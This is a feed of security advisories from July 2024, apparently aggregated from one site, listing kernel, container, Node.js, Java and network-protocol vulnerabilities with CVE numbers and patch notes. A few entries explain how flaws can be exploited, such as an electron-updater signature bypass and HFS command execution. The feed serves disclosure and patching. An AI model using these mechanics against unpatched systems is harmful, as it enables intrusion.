08.07.2024 03:00:00	redhat	[RHSA-2024:4351] virt:rhel and virt-devel:rhel security and bug fix update (low)	Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix:* virt:rhel/libvirt: stack use-after-free in virNetClientIOEventLoop (CVE-2024-4418) Bug fix:* virsh destroy with --graceful destroyed a paused guest (qemu process paused by SIGSTOP) (JIRA:RHEL-36064)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4351
08.07.2024 03:00:00	redhat	[RHSA-2024:4367] pki-core security update (important)	The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* dogtag ca: token authentication bypass vulnerability (CVE-2023-4727)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4367
08.07.2024 03:00:00	redhat	[RHSA-2024:4376] libreswan security update (moderate)	Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: IKEv1 default AH/ESP responder can crash and restart (CVE-2024-3652)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4376
08.07.2024 03:00:00	redhat	[RHSA-2024:4371] buildah security update (important)	The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4371
08.07.2024 03:00:00	redhat	[RHSA-2024:4378] podman security update (important)	The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4378
08.07.2024 03:00:00	redhat	[RHSA-2024:4379] gvisor-tap-vsock security update (important)	A replacement for libslirp and VPNKit, written in pure Go. It is based on the network stack of gVisor and is used to provide networking for podman-machine virtual machines. Compared to libslirp, gvisor-tap-vsock brings a configurable DNS server and dynamic port forwarding.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4379
08.07.2024 03:00:00	redhat	[RHSA-2024:4352] kernel-rt security and bug fix update (important)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: tls (CVE-2024-26585,CVE-2024-26584, CVE-2024-26583* kernel-rt: kernel: PCI interrupt mapping cause oops [rhel-8] (CVE-2021-46909)* kernel: ipc/mqueue, msg, sem: avoid relying on a stack reference past its expiry (CVE-2021-47069)* kernel: hwrng: core - Fix page fault dead lock on mmap-ed hwrng (CVE-2023-52615)* kernel-rt: kernel: drm/amdgpu: use-after-free vulnerability (CVE-2024-26656)* kernel: Bluetooth: Avoid potential use-after-free in hci_error_reset CVE-2024-26801)* kernel: Squashfs: check the inode number is not the invalid value of zero (CVE-2024-26982)* kernel: netfilter: nf_tables: use timestamp to check for set element timeout (CVE-2024-27397)* kernel: wifi: mac80211: (CVE-2024-35789, CVE-2024-35838, CVE-2024-35845)* kernel: wifi: nl80211: reject iftype change with mesh ID change (CVE-2024-27410)* kernel: perf/core: Bail out early if the request AUX area is out of bound (CVE-2023-52835)* kernel:TCP-spoofed ghost ACKs and leak initial sequence number (CVE-2023-52881)* kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack (CVE-2020-26555)* kernel: ovl: fix leaked dentry (CVE-2021-46972)* kernel: platform/x86: dell-smbios-wmi: Fix oops on rmmod dell_smbios (CVE-2021-47073)* kernel: mm/damon/vaddr-test: memory leak in damon_do_test_apply_three_regions() (CVE-2023-52560)* kernel: ppp_async: limit MRU to 64K (CVE-2024-26675)* kernel: mm/swap: fix race when skipping swapcache (CVE-2024-26759)* kernel: RDMA/mlx5: Fix fortify source warning while accessing Eth segment (CVE-2024-26907)* kernel: x86/mm: Disallow vsyscall page read for copy_from_kernel_nofault() (CVE-2024-26906)* kernel: net: ip_tunnel: prevent perpetual headroom growth (CVE-2024-26804)* kernel: net/usb: kalmia: avoid printing uninitialized value on error path (CVE-2023-52703)* kernel: KVM: SVM: improper check in svm_set_x2apic_msr_interception allows direct access to host x2apic msrs (CVE-2023-5090)* kernel: EDAC/thunderx: Incorrect buffer size in drivers/edac/thunderx_edac.c (CVE-2023-52464)* kernel: ipv6: sr: fix possible use-after-free and null-ptr-deref (CVE-2024-26735)* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)* kernel: net/bnx2x: Prevent access to a freed page in page_pool (CVE-2024-26859)* kernel: crypto: (CVE-2024-26974, CVE-2023-52813)* kernel: can: (CVE-2023-52878, CVE-2021-47456)* kernel: usb: (CVE-2023-52781, CVE-2023-52877)* kernel: net/mlx5e: fix a potential double-free in fs_any_create_groups (CVE-2023-52667)* kernel: usbnet: sanity check for maxpacket (CVE-2021-47495)* kernel: gro: fix ownership transfer (CVE-2024-35890)* kernel: erspan: make sure erspan_base_hdr is present in skb->head (CVE-2024-35888)* kernel: tipc: fix kernel warning when sending SYN message (CVE-2023-52700)* kernel: net/mlx5/mlxsw: (CVE-2024-35960, CVE-2024-36007, CVE-2024-35855)* kernel: net/mlx5e: (CVE-2024-35959, CVE-2023-52626, CVE-2024-35835)* kernel: mlxsw: (CVE-2024-35854, CVE-2024-35853, CVE-2024-35852)* kernel: net: (CVE-2024-35958, CVE-2021-47311, CVE-2021-47236, CVE-2021-47310)* kernel: i40e: Do not use WQ_MEM_RECLAIM flag for workqueue (CVE-2024-36004)* kernel: mISDN: fix possible use-after-free in HFC_cleanup() (CVE-2021-47356)* kernel: udf: Fix NULL pointer dereference in udf_symlink function (CVE-2021-47353)Bug Fix(es):* kernel-rt: update RT source tree to the latest RHEL-8.10.z kernel (JIRA:RHEL-40882)* [rhel8.9][cxgb4]BUG: using smp_processor_id() in preemptible [00000000] code: ethtool/54735 (JIRA:RHEL-8779)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4352
08.07.2024 21:38:40	npm	[NPM:GHSA-5F4X-HWV2-W9W2] rejetto HFS vulnerable to OS Command Execution by remote authenticated users (critical)	rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5F4X-HWV2-W9W2
08.07.2024 03:00:00	redhat	[RHSA-2024:4211] kernel security and bug fix update (important)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack (CVE-2020-26555)* kernel: TCP-spoofed ghost ACKs and leak leak initial sequence number (CVE-2023-52881,RHV-2024-1001)* kernel: ovl: fix leaked entry (CVE-2021-46972)* kernel: platform/x86: dell-smbios-wmi: Fix oops on rmmod dell_smbios (CVE-2021-47073)* kernel: gro: fix ownership transfer (CVE-2024-35890)* kernel: tls: (CVE-2024-26584, CVE-2024-26583, CVE-2024-26585)* kernel: wifi: (CVE-2024-35789, CVE-2024-27410, CVE-2024-35838, CVE-2024-35845)* kernel: mlxsw: (CVE-2024-35855, CVE-2024-35854, CVE-2024-35853, CVE-2024-35852, CVE-2024-36007)* kernel: PCI interrupt mapping cause oops [rhel-8] (CVE-2021-46909)* kernel: ipc/mqueue, msg, sem: avoid relying on a stack reference past its expiry (CVE-2021-47069)* kernel: hwrng: core - Fix page fault dead lock on mmap-ed hwrng [rhel-8] (CVE-2023-52615)* kernel: net/mlx5e: (CVE-2023-52626, CVE-2024-35835, CVE-2023-52667, CVE-2024-35959)* kernel: drm/amdgpu: use-after-free vulnerability (CVE-2024-26656)* kernel: Bluetooth: Avoid potential use-after-free in hci_error_reset [rhel-8] (CVE-2024-26801)* kernel: Squashfs: check the inode number is not the invalid value of zero (CVE-2024-26982)* kernel: netfilter: nf_tables: use timestamp to check for set element timeout [rhel-8.10] (CVE-2024-27397)* kernel: mm/damon/vaddr-test: memory leak in damon_do_test_apply_three_regions() (CVE-2023-52560)* kernel: ppp_async: limit MRU to 64K (CVE-2024-26675)* kernel: x86/mm/swap: (CVE-2024-26759, CVE-2024-26906)* kernel: tipc: fix kernel warning when sending SYN message [rhel-8] (CVE-2023-52700)* kernel: RDMA/mlx5: Fix fortify source warning while accessing Eth segment (CVE-2024-26907)* kernel: erspan: make sure erspan_base_hdr is present in skb->head (CVE-2024-35888)* kernel: powerpc/imc-pmu/powernv: (CVE-2023-52675, CVE-2023-52686)* kernel: KVM: SVM: improper check in svm_set_x2apic_msr_interception allows direct access to host x2apic msrs (CVE-2023-5090)* kernel: EDAC/thunderx: Incorrect buffer size in drivers/edac/thunderx_edac.c (CVE-2023-52464)* kernel: ipv6: sr: fix possible use-after-free and null-ptr-deref (CVE-2024-26735)* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)* kernel: crypto: (CVE-2024-26974, CVE-2023-52669, CVE-2023-52813)* kernel: net/mlx5/bnx2x/usb: (CVE-2024-35960, CVE-2024-35958, CVE-2021-47310, CVE-2024-26804, CVE-2021-47311, CVE-2024-26859, CVE-2021-47236, CVE-2023-52703)* kernel: i40e: Do not use WQ_MEM_RECLAIM flag for workqueue (CVE-2024-36004)* kernel: perf/core: Bail out early if the request AUX area is out of bound (CVE-2023-52835)* kernel: USB/usbnet: (CVE-2023-52781, CVE-2023-52877, CVE-2021-47495)* kernel: can: (CVE-2023-52878, CVE-2021-47456)* kernel: mISDN: fix possible use-after-free in HFC_cleanup() (CVE-2021-47356)* kernel: udf: Fix NULL pointer dereference in udf_symlink function (CVE-2021-47353)Bug Fix(es):* Kernel panic - kernel BUG at mm/slub.c:376! (JIRA:RHEL-29783)* Temporary values in FIPS integrity test should be zeroized [rhel-8.10.z] (JIRA:RHEL-35361)* RHEL8.6 - kernel: s390/cpum_cf: make crypto counters upward compatible (JIRA:RHEL-36048)* [RHEL8] blktests block/024 failed (JIRA:RHEL-8130)* RHEL8.9: EEH injections results Error: Power fault on Port 0 and other call traces(Everest/1050/Shiner) (JIRA:RHEL-14195)* Latency spikes with Matrox G200 graphic cards (JIRA:RHEL-36172)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4211
08.07.2024 20:05:42	rustsec	[RUSTSEC-2024-0346] Incorrect usage of `#[repr(packed)]`	The affected versions make unsafe memory accesses under the assumption that `#[repr(packed)]` has a guaranteed field order. The Rust specification does not guarantee this, and https://github.com/rust-lang/rust/pull/125360 (1.80.0-beta) starts reordering fields of `#[repr(packed)]` structs, leading to illegal memory accesses.The patched versions `0.9.7` and `0.10.3` use `#[repr(C, packed)]`, which guarantees field order.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0346
08.07.2024 17:45:30	rustsec	[RUSTSEC-2024-0347] Incorrect usage of `#[repr(packed)]`	The affected versions make unsafe memory accesses under the assumption that `#[repr(packed)]` has a guaranteed field order. The Rust specification does not guarantee this, and https://github.com/rust-lang/rust/pull/125360 (1.80.0-beta) starts reordering fields of `#[repr(packed)]` structs, leading to illegal memory accesses.The patched versions `0.9.7` and `0.10.4` use `#[repr(C, packed)]`, which guarantees field order.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0347
10.07.2024 00:41:16	npm	[NPM:GHSA-9JXC-QJR9-VJXQ] electron-updater Code Signing Bypass on Windows (high)	### ObservationsThe file `packages/electron-updater/src/windowsExecutableCodeSignatureVerifier.ts` implements the signature validation routine for Electron applications on Windows. It executes the following command in a new shell (`process.env.ComSpec` on Windows, usually `C:\Windows\System32\cmd.exe`):https://github.com/electron-userland/electron-builder/blob/140e2f0eb0df79c2a46e35024e96d0563355fc89/packages/electron-updater/src/windowsExecutableCodeSignatureVerifier.ts#L35-L41Because of the surrounding shell, a first pass by `cmd.exe` expands any environment variable found in command-line above.### ExploitationThis creates a situation where `verifySignature()` can be tricked into validating the certificate of a different file than the one that was just downloaded. If the step is successful, the malicious update will be executed even if its signature is invalid. ### ImpactThis attack assumes a compromised update manifest (server compromise, Man-in-the-Middle attack if fetched over HTTP, Cross-Site Scripting to point the application to a malicious updater server, etc.).### PatchThis vulnerability was patched in #8295, by comparing the path in the output of `Get-AuthenticodeSignature` with the intended one. The patch is available starting from 6.3.0-alpha.6.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9JXC-QJR9-VJXQ
09.07.2024 20:05:30	ubuntu	[USN-6888-1] Django vulnerabilities	Several security issues were fixed in Django.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6888-1
10.07.2024 00:13:50	maven	[MAVEN:GHSA-J4R7-P9FP-W3F3] Spring Cloud Function Framework vulnerable to Denial of Service (high)	In Spring Cloud Function framework, versions 4.1.x prior to 4.1.2, 4.0.x prior to 4.0.8 an application is vulnerable to a DOS attack when attempting to compose functions with non-existing functions.Specifically, an application is vulnerable when all of the following are true:User is using Spring Cloud Function Web moduleAffected Spring Products and Versions Spring Cloud Function Framework 4.1.0 to 4.1.2 4.0.0 to 4.0.8References https://spring.io/security/cve-2022-22979 https://checkmarx.com/blog/spring-function-cloud-dos-cve-2022-22979-and-unintended-function-invocation/ History 2020-01-16: Initial vulnerability report published.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J4R7-P9FP-W3F3
09.07.2024 17:04:56	ubuntu	[USN-6887-1] OpenSSH vulnerability (high)	OpenSSH could be made to expose timing information over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6887-1
09.07.2024 16:32:38	npm	[NPM:GHSA-3G92-W8C5-73PQ] Undici vulnerable to data leak when using response.arrayBuffer() (low)	### ImpactDepending on network and process conditions of a `fetch()` request, `response.arrayBuffer()` might include portion of memory from the Node.js process.### PatchesThis has been patched in v6.19.2.### WorkaroundsThere are no known workaround.### Referenceshttps://github.com/nodejs/undici/issues/3337https://github.com/nodejs/undici/issues/3328https://github.com/nodejs/undici/pull/3338https://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3G92-W8C5-73PQ
09.07.2024 15:12:13	ubuntu	[USN-6886-1] Go vulnerabilities (critical)	Several security issues were fixed in Go.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6886-1
09.07.2024 04:11:28	ubuntu	[USN-6880-1] Tomcat vulnerability (high)	Tomcat could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6880-1
10.07.2024 00:09:49	maven	[MAVEN:GHSA-CH7Q-GPFF-H9HP] Undertow Missing Release of Memory after Effective Lifetime vulnerability (moderate)	A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CH7Q-GPFF-H9HP
09.07.2024 03:00:00	cisa	[CISA-2024:0709] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0709
09.07.2024 03:00:00	gentoo	[GLSA-202407-23] LIVE555 Media Server: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in LIVE555 Media Server, the worst of which could lead to a denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-23
09.07.2024 03:00:00	redhat	[RHSA-2024:4420] virt:rhel and virt-devel:rhel security update (important)	Kernel-based Virtual Machine (KVM) offers a full virtualization solution forLinux on numerous hardware platforms. The virt:rhel module contains packageswhich provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4420
09.07.2024 03:00:00	redhat	[RHSA-2024:4438] dotnet6.0 security update (moderate)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.132 and Runtime 6.0.32.Security Fix(es):* dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4438
09.07.2024 03:00:00	redhat	[RHSA-2024:4422] fence-agents security update (moderate)	The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4422
09.07.2024 03:00:00	redhat	[RHSA-2024:4439] dotnet6.0 security update (moderate)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET 6.0 to SDK 6.0.132 and Runtime 6.0.32.Security Fix(es):* dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4439
10.07.2024 00:04:45	maven	[MAVEN:GHSA-XPP6-8R3J-WW43] Undertow Denial of Service vulnerability (high)	A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected `0\r\n` termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XPP6-8R3J-WW43
09.07.2024 15:36:52	almalinux	[ALSA-2024:4376] libreswan security update (moderate)	libreswan security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4376
09.07.2024 15:30:05	almalinux	[ALSA-2024:4378] podman security update (important)	podman security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4378
09.07.2024 15:27:50	almalinux	[ALSA-2024:4379] gvisor-tap-vsock security update (important)	gvisor-tap-vsock security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4379
09.07.2024 15:31:42	almalinux	[ALSA-2024:4371] buildah security update (important)	buildah security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4371
09.07.2024 20:03:54	rubysec	[RUBYSEC:RAILS_ADMIN-2024-39308] RailsAdmin Cross-site Scripting vulnerability in the list view (medium)	### ImpactRailsAdmin list view has the XSS vulnerability, caused byimproperly-escaped HTML title attribute. The issue was originallyreported in https://github.com/railsadminteam/rails_admin/issues/3686.### PatchesUpgrade to [3.1.3](https://rubygems.org/gems/rails_admin/versions/3.1.3)or [2.3.0](https://rubygems.org/gems/rails_admin/versions/2.3.0).### Workarounds1. Copy the index view (located under the path `app/views/rails_admin/main/index.html.erb`) from the RailsAdmin version you use, and place it into your application by using the same path.2. Open the view file by an editor, and remove `strip_tags` from the title attribute (as shown in GHSA advisory below).Note: The view file created by this needs to be removed afterupgrading RailsAdmin afterwards, unless this old view continue tobe used. Only do this if you can't upgrade RailsAdmin now for a reason.### Referenceshttps://owasp.org/www-community/attacks/xss/https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-strip_tags	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RAILS_ADMIN-2024-39308
11.07.2024 00:11:08	ubuntu	[USN-6866-3] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6866-3
11.07.2024 00:09:27	ubuntu	[USN-6868-2] Linux kernel (AWS) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6868-2
11.07.2024 00:06:59	ubuntu	[USN-6892-1] Linux kernel (IBM) vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6892-1
10.07.2024 20:52:20	slackware	[SSA:2024-192-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.13.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.13.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-30/ https://www.cve.org/CVERecord?id=CVE-2024-6600 https://www.cve.org/CVERecord?id=CVE-2024-6601 https://www.cve.org/CVERecord?id=CVE-2024-6602 https://www.cve.org/CVERecord?id=CVE-2024-6603 https://www.cve.org/CVERecord?id=CVE-2024-6604 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.13.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.13.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:c90479ec0265464c811b4c24755bd9bd mozilla-firefox-115.13.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:cb81a75212824623a08350e8aa1c59bd mozilla-firefox-115.13.0esr-x86_64-1_slack15.0.txzSlackware -current package:d5e4a996eda4de0c2c2517e65ee9e980 xap/mozilla-firefox-128.0esr-i686-1.txzSlackware x86_64 -current package:e60e7cdfa3a548510c4254a31cdc909b xap/mozilla-firefox-128.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.13.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-192-01
10.07.2024 19:04:09	maven	[MAVEN:GHSA-77VC-RJ32-2R33] OpenSearch Observability does not properly restrict access to private tenant resources (moderate)	### SummaryAn issue in the OpenSearch observability plugins allows unintended access to private tenant resources like notebooks. The system did not properly check if the user was the resource author when accessing resources in a private tenant, leading to potential data being revealed.### ImpactThe lack of proper access control validation for private tenant resources in the OpenSearch observability and reporting plugins can lead to unintended data access. If an authorized user with observability or reporting roles is aware of another user's private tenant resource ID, such as a notebook, they can potentially read, modify, or take ownership of that resource, despite not being the original author, thus impacting the confidentiality and integrity of private tenant resources. The impact is confined to private tenant resources, where authorized users may gain inappropriate visibility into data intended to be private from other users within the same OpenSearch instance, potentially violating the intended separation of access.Impacted versions <= 2.13### PatchesThe patches are included in OpenSearch 2.14### WorkaroundsNone### ReferencesOpenSearch 2.14 is available for download at https://opensearch.org/versions/opensearch-2-14-0.htmlThe latest version of OpenSearch is available for download at https://opensearch.org/downloads.html	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-77VC-RJ32-2R33
11.07.2024 00:32:34	npm	[NPM:GHSA-FQ54-2J52-JC42] Next.js Denial of Service (DoS) condition (high)	### ImpactA Denial of Service (DoS) condition was identified in Next.js. Exploitation of the bug can trigger a crash, affecting the availability of the server.This vulnerability can affect all Next.js deployments on the affected versions.### PatchesThis vulnerability was resolved in Next.js 13.5 and later. We recommend that users upgrade to a safe version.### WorkaroundsThere are no official workarounds for this vulnerability.#### CreditWe'd like to thank Thai Vu of [flyseccorp.com](http://flyseccorp.com/) for responsible disclosure of this vulnerability.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQ54-2J52-JC42
10.07.2024 19:00:00	cisco	[CISCO-SA-XR-SECURE-BOOT-QUD5G8AP] Cisco IOS XR Software Secure Boot Bypass Vulnerability (high)	A vulnerability in the boot process of Cisco IOS XR Software could allow an authenticated, local attacker with high privileges to bypass the Cisco Secure Boot functionality and load unverified software on an affected device. To exploit this successfully, the attacker must have root-system privileges on the affected device.This vulnerability is due to an error in the software build process. An attacker could exploit this vulnerability by manipulating the system’s configuration options to bypass some of the integrity checks that are performed during the booting process. A successful exploit could allow the attacker to control the boot configuration, which could enable them to bypass of the requirement to run Cisco signed images or alter the security properties of the running system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-XR-SECURE-BOOT-QUD5G8AP
10.07.2024 19:00:00	cisco	[CISCO-SA-RADIUS-SPOOFING-JULY-2024-87CCDWZ3] RADIUS Protocol Spoofing Vulnerability (Blast-RADIUS): July 2024 (high)	On July 7, 2024, security researchers disclosed the following vulnerability in the RADIUS protocol:CVE-2024-3596: RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by an on-path attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.This vulnerability may impact any RADIUS client and server. For a description of this vulnerability, see VU#456537: RADIUS protocol susceptible to forgery attacks ["https://www.kb.cert.org/vuls/id/456537"].This advisory will be updated as additional information becomes available.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-RADIUS-SPOOFING-JULY-2024-87CCDWZ3
10.07.2024 17:15:50	go	[GO-2024-2979] Cache driver GetBlob() allows read access to any blob without access controlcheck in zotregistry.dev/zot (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2979
11.07.2024 00:38:32	npm	[NPM:GHSA-W5FC-GJ3H-26RX] speaker vulnerable to Denial of Service (high)	All versions of the package speaker are vulnerable to Denial of Service (DoS) when providing unexpected input types to the channels property of the Speaker object makes it possible to reach an assert macro. Exploiting this vulnerability can lead to a process crash.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W5FC-GJ3H-26RX
11.07.2024 00:29:31	npm	[NPM:GHSA-WXR3-2HGV-QM8F] node-twain vulnerable to Improper Check or Handling of Exceptional Conditions (high)	All versions of the package node-twain are vulnerable to Improper Check or Handling of Exceptional Conditions due to the length of the source data not being checked. Creating a new twain.TwainSDK with a productName or productFamily, manufacturer, version.info property of length >= 34 chars leads to a buffer overflow vulnerability.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WXR3-2HGV-QM8F
11.07.2024 00:28:43	npm	[NPM:GHSA-VJPV-X8P9-7P85] images vulnerable to Denial of Service (high)	All versions of the package images are vulnerable to Denial of Service (DoS) due to providing unexpected input types to several different functions. This makes it possible to reach an assert macro, leading to a process crash.Note:By providing some specific integer values (like 0) to the size function, it is possible to obtain a Segmentation fault error, leading to the process crash.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VJPV-X8P9-7P85
10.07.2024 23:43:35	npm	[NPM:GHSA-G533-XQ5W-JMF3] node-stringbuilder vulnerable to Out-of-bounds Read (high)	All versions of the package node-stringbuilder are vulnerable to Out-of-bounds Read due to incorrect memory length calculation, by calling ToBuffer, ToString, or CharAt on a StringBuilder object with a non-empty string value input. It's possible to return previously allocated memory, for example, by providing negative indexes, leading to an Information Disclosure.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G533-XQ5W-JMF3
10.07.2024 23:43:22	npm	[NPM:GHSA-7VHM-FMPH-7WXW] audify vulnerable to Improper Validation of Array Index (high)	All versions of the package audify are vulnerable to Improper Validation of Array Index when frameSize is provided to the new OpusDecoder().decode or new OpusDecoder().decodeFloat functions it is not checked for negative values. This can lead to a process crash.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7VHM-FMPH-7WXW
